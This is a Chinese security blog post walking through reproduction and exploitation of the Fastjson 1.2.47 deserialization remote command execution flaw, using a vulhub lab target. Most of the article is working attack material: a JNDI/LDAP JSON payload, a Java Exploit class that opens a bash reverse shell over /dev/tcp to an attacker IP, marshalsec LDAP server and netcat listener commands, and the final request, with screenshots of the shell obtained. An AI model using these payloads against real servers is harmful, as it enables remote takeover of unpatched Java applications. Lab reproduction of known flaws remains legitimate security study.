<!DOCTYPE html>
<html lang="zh">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="White">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="White">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="">
    <meta name="description" content="0x00 漏洞原因Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越，被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。 0x01 靶机环境安装1234567git clone https:&#x2F;&#x2F;github.com&amp;">
<meta property="og:type" content="article">
<meta property="og:title" content="Fastjson 1.2.47 远程命令执行漏洞复现与利用">
<meta property="og:url" content="https://wh1te.fun/2020/06/22/Fastjson%201.2.47%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="0x00 漏洞原因Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越，被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。 0x01 靶机环境安装1234567git clone https:&#x2F;&#x2F;github.com&amp;">
<meta property="og:locale" content="zh">
<meta property="og:image" content="http://photo-pool.oss-cn-hangzhou.aliyuncs.com/2020/06/22/15928143471537.jpg">
<meta property="og:image" content="http://photo-pool.oss-cn-hangzhou.aliyuncs.com/2020/06/22/15928143628321.jpg">
<meta property="og:image" content="http://photo-pool.oss-cn-hangzhou.aliyuncs.com/2020/06/22/15928148082650.jpg">
<meta property="og:image" content="http://photo-pool.oss-cn-hangzhou.aliyuncs.com/2020/06/22/15928150951706.jpg">
<meta property="og:image" content="http://photo-pool.oss-cn-hangzhou.aliyuncs.com/2020/06/22/15928151704290.jpg">
<meta property="article:published_time" content="2020-06-22T09:38:00.000Z">
<meta property="article:modified_time" content="2020-07-26T11:19:02.389Z">
<meta property="article:author" content="White">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://photo-pool.oss-cn-hangzhou.aliyuncs.com/2020/06/22/15928143471537.jpg">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    
    <title>Fastjson 1.2.47 远程命令执行漏洞复现与利用 · White&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/favicon.ico" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
<meta name="generator" content="Hexo 4.2.1"></head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >White&#39;s Blog.</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">Fastjson 1.2.47 远程命令执行漏洞复现与利用</a>
            </div>
    </div>
    
    <a class="home-link" href=/>White's Blog.</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            Fastjson 1.2.47 远程命令执行漏洞复现与利用
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">520</span>阅读时长: <span class="post-count reading-time">2 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2020/06/22</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h2 id="0x00-漏洞原因"><a href="#0x00-漏洞原因" class="headerlink" title="0x00 漏洞原因"></a>0x00 漏洞原因</h2><p>Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越，被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。</p>
<h2 id="0x01-靶机环境安装"><a href="#0x01-靶机环境安装" class="headerlink" title="0x01 靶机环境安装"></a>0x01 靶机环境安装</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">git clone https:&#x2F;&#x2F;github.com&#x2F;vulhub&#x2F;vulhub</span><br><span class="line"></span><br><span class="line">cd vulhub&#x2F;fastjson&#x2F;1.2.47-rce</span><br><span class="line"></span><br><span class="line">docker-compose up -d</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;[ip]:8090</span><br></pre></td></tr></table></figure>

<h2 id="0x02-如何测试"><a href="#0x02-如何测试" class="headerlink" title="0x02 如何测试"></a>0x02 如何测试</h2><p>vps监听端口<br><code>nc -lvvp 11111</code></p>
<p>burp发送请求</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;"name":&#123;"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"&#125;,"x":&#123;"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://[vpsip]:11111/Exploit","autoCommit":true&#125;&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>如果vps收到了流量说明可能存在漏洞</p>
<h2 id="0x03-攻击机环境安装"><a href="#0x03-攻击机环境安装" class="headerlink" title="0x03 攻击机环境安装"></a>0x03 攻击机环境安装</h2><h3 id="下载工具"><a href="#下载工具" class="headerlink" title="下载工具"></a>下载工具</h3><p><code>git clone https://github.com/CaijiOrz/fastjson-1.2.47-RCE</code></p>
<h3 id="修改exp"><a href="#修改exp" class="headerlink" title="修改exp"></a>修改exp</h3><p><code>vim Exploit.java</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Exploit</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">Exploit</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">try</span>&#123;</span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">"/bin/bash -c $@|bash 0 echo bash -i &gt;&amp;/dev/tcp/[攻击机ip]/[nc接受shell的端口] 0&gt;&amp;1"</span>);</span><br><span class="line">        &#125;<span class="keyword">catch</span>(Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] argv)</span></span>&#123;</span><br><span class="line">        Exploit e = <span class="keyword">new</span> Exploit();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="编译exp"><a href="#编译exp" class="headerlink" title="编译exp"></a>编译exp</h3><p><code>javac Exploit.java</code></p>
<h3 id="监听接收shell的端口"><a href="#监听接收shell的端口" class="headerlink" title="监听接收shell的端口"></a>监听接收shell的端口</h3><p><code>nc -lvvp [nc接受shell的端口]</code></p>
<h3 id="快速启动http服务"><a href="#快速启动http服务" class="headerlink" title="快速启动http服务"></a>快速启动http服务</h3><p><code>python -m SimpleHTTPServer [http服务端口]</code><br>或<br><code>python3 python3 -m http.server [http服务端口]</code></p>
<p>测试一下浏览器访问[攻击机ip]:[http服务端口]<br>查看是否收到响应</p>
<p><img src="http://photo-pool.oss-cn-hangzhou.aliyuncs.com/2020/06/22/15928143471537.jpg" alt="-w449"></p>
<p><img src="http://photo-pool.oss-cn-hangzhou.aliyuncs.com/2020/06/22/15928143628321.jpg" alt="-w441"></p>
<h3 id="运行LDAP服务"><a href="#运行LDAP服务" class="headerlink" title="运行LDAP服务"></a>运行LDAP服务</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer  http:&#x2F;&#x2F;[攻击机ip]&#x2F;#Exploit [LDAP服务端口]</span><br></pre></td></tr></table></figure>


<h3 id="准备完成"><a href="#准备完成" class="headerlink" title="准备完成"></a>准备完成</h3><p>所以现在已经做好了如下准备</p>
<pre><code>一个编译好的Exploit.class
一个攻击机上的nc监听Exploit中写好的端口
一个LDAP服务</code></pre><p><img src="http://photo-pool.oss-cn-hangzhou.aliyuncs.com/2020/06/22/15928148082650.jpg" alt="-w715"></p>
<h2 id="0x04-如何利用"><a href="#0x04-如何利用" class="headerlink" title="0x04 如何利用"></a>0x04 如何利用</h2><p><strong>抓包修改Content-Type: application/json</strong></p>
<p><strong>exp:</strong></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="attr">"e"</span>:&#123;<span class="attr">"@type"</span>:<span class="string">"java.lang.Class"</span>,<span class="attr">"val"</span>:<span class="string">"com.sun.rowset.JdbcRowSetImpl"</span>&#125;,<span class="attr">"f"</span>:&#123;<span class="attr">"@type"</span>:<span class="string">"com.sun.rowset.JdbcRowSetImpl"</span>,<span class="attr">"dataSourceName"</span>:<span class="string">"ldap://[攻击机ip]:[LDAP服务端口]/Exploit"</span>,<span class="attr">"autoCommit"</span>:<span class="literal">true</span>&#125;</span><br></pre></td></tr></table></figure>


<p>发送exp</p>
<p><img src="http://photo-pool.oss-cn-hangzhou.aliyuncs.com/2020/06/22/15928150951706.jpg" alt="-w993"></p>
<p>成功反弹shell</p>
<p><img src="http://photo-pool.oss-cn-hangzhou.aliyuncs.com/2020/06/22/15928151704290.jpg" alt="-w716"></p>
<p>参考文章：<br><a href="https://vulhub.org/#/environments/fastjson/1.2.47-rce/" target="_blank" rel="noopener">https://vulhub.org/#/environments/fastjson/1.2.47-rce/</a></p>
<p><a href="https://github.com/CaijiOrz/fastjson-1.2.47-RCE" target="_blank" rel="noopener">https://github.com/CaijiOrz/fastjson-1.2.47-RCE</a></p>
<p><a href="https://www.cnblogs.com/0nth3way/p/13132195.html" target="_blank" rel="noopener">https://www.cnblogs.com/0nth3way/p/13132195.html</a></p>

    </article>
    <!-- license  -->
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2020/11/02/%E9%98%BF%E9%87%8C%E4%BA%91Linux%E4%BD%BF%E7%94%A8Clash%E8%BF%9B%E8%A1%8C%E5%A4%96%E7%BD%91%E4%BB%A3%E7%90%86%E5%8A%A0%E9%80%9F/" title= "阿里云Linux使用Clash进行外网代理加速">
                    <div class="nextTitle">阿里云Linux使用Clash进行外网代理加速</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2020/06/21/Apache%20Shiro%20%3C%201.2.4%20RCE%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" title= "Apache Shiro < 1.2.4 RCE 漏洞复现与利用">
                    <div class="prevTitle">Apache Shiro < 1.2.4 RCE 漏洞复现与利用</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- gitalk评论 -->

    <!-- utteranc评论 -->

    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:huangxber@gmail.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/hxber" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title=wechat>
                  
                  <img class="profile-qr" src="/assets/Wechat_QR.jpg" />
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-漏洞原因"><span class="toc-number">1.</span> <span class="toc-text">0x00 漏洞原因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-靶机环境安装"><span class="toc-number">2.</span> <span class="toc-text">0x01 靶机环境安装</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-如何测试"><span class="toc-number">3.</span> <span class="toc-text">0x02 如何测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-攻击机环境安装"><span class="toc-number">4.</span> <span class="toc-text">0x03 攻击机环境安装</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#下载工具"><span class="toc-number">4.1.</span> <span class="toc-text">下载工具</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#修改exp"><span class="toc-number">4.2.</span> <span class="toc-text">修改exp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#编译exp"><span class="toc-number">4.3.</span> <span class="toc-text">编译exp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#监听接收shell的端口"><span class="toc-number">4.4.</span> <span class="toc-text">监听接收shell的端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#快速启动http服务"><span class="toc-number">4.5.</span> <span class="toc-text">快速启动http服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#运行LDAP服务"><span class="toc-number">4.6.</span> <span class="toc-text">运行LDAP服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#准备完成"><span class="toc-number">4.7.</span> <span class="toc-text">准备完成</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-如何利用"><span class="toc-number">5.</span> <span class="toc-text">0x04 如何利用</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 14
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2021 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/02</span><a class="archive-post-title" href= "/2021/06/02/MacOS-%E5%AE%89%E8%A3%85BurpSuite2021-6-1/" >MacOS 安装BurpSuite2021.6.1</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2020 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/02</span><a class="archive-post-title" href= "/2020/11/02/%E9%98%BF%E9%87%8C%E4%BA%91Linux%E4%BD%BF%E7%94%A8Clash%E8%BF%9B%E8%A1%8C%E5%A4%96%E7%BD%91%E4%BB%A3%E7%90%86%E5%8A%A0%E9%80%9F/" >阿里云Linux使用Clash进行外网代理加速</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/22</span><a class="archive-post-title" href= "/2020/06/22/Fastjson%201.2.47%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%A9%E7%94%A8/" >Fastjson 1.2.47 远程命令执行漏洞复现与利用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/21</span><a class="archive-post-title" href= "/2020/06/21/Apache%20Shiro%20%3C%201.2.4%20RCE%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" >Apache Shiro < 1.2.4 RCE 漏洞复现与利用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/17</span><a class="archive-post-title" href= "/2020/06/17/CodiMD%E6%90%AD%E5%BB%BA/" >CodiMD搭建</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/14</span><a class="archive-post-title" href= "/2020/06/14/Windows_password_hashdump/" >Windows password hashdump</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/11</span><a class="archive-post-title" href= "/2019/11/11/2019%E7%99%BE%E8%B6%8A%E6%9D%AF%E7%BA%BF%E4%B8%8A%E8%B5%9BWriteup/" >2019百越杯线上赛Writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/07</span><a class="archive-post-title" href= "/2019/11/07/%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%E7%9A%84PWN%E5%85%A5%E9%97%A80x02/" >从零开始的PWN入门0x02</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/01</span><a class="archive-post-title" href= "/2019/11/01/%E5%88%A9%E7%94%A8curl%E7%9A%84ssrf%E8%BF%9B%E8%A1%8Csmtp%E6%97%A5%E5%BF%97%E6%B1%A1%E6%9F%93getshell/" >利用curl的ssrf进行smtp日志污染getshell</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/15</span><a class="archive-post-title" href= "/2019/08/15/%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%E7%9A%84PWN%E5%85%A5%E9%97%A80x01/" >从零开始的PWN入门0x01</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/10</span><a class="archive-post-title" href= "/2019/08/10/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8Ecurl/" >反序列化与curl</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/23</span><a class="archive-post-title" href= "/2019/02/23/%E4%BD%BF%E7%94%A8let%E2%80%99s-encrypt-ssl-%E6%9B%B4%E6%96%B0SSL%E8%AF%81%E4%B9%A6/" >使用let’s encrypt ssl 更新SSL证书</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/07</span><a class="archive-post-title" href= "/2018/05/07/%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%E7%9A%84PWN%E5%85%A5%E9%97%A80x00/" >从零开始的PWN入门0x00</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/28</span><a class="archive-post-title" href= "/2018/01/28/%E5%A6%82%E4%BD%95%E5%9C%A8Visual-Studio-2017%E4%B8%AD%E5%85%B3%E9%97%AD%E5%AE%89%E5%85%A8%E5%91%A8%E6%9C%9F%E6%A3%80%E6%9F%A5/" >如何在Visual Studio 2017中关闭安全周期检查?</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
